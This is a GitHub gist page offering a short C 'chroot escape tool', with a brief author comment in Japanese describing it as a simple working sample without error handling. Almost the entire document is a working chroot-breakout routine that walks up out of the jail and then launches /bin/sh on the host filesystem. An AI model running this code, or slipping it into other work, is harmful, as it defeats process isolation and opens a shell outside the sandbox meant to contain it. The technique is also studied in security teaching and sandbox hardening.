Skip to content

Instantly share code, notes, and snippets.

@WinLinux1028
Last active October 25, 2024 07:08
Show Gist options
  • Save WinLinux1028/f8c7a993a9330e7baf51c88c2ad1016a to your computer and use it in GitHub Desktop.
Save WinLinux1028/f8c7a993a9330e7baf51c88c2ad1016a to your computer and use it in GitHub Desktop.
chroot脱獄ツール
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void) {
mkdir("escape", 0777);
chroot("escape");
rmdir("escape");
printf("Escaping...\n");
for(int i = 0; i < 65536; i++) {
chdir("..");
}
chroot(".");
printf("You have been escaped!\n");
char* args[] = {"/bin/sh", NULL};
execv(args[0], args);
}
@WinLinux1028
Copy link
Author

WinLinux1028 commented Mar 19, 2023

とりあえず動作し、かつロジックがわかりやすいサンプルが欲しいと思って書いたので、エラー処理はありません

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment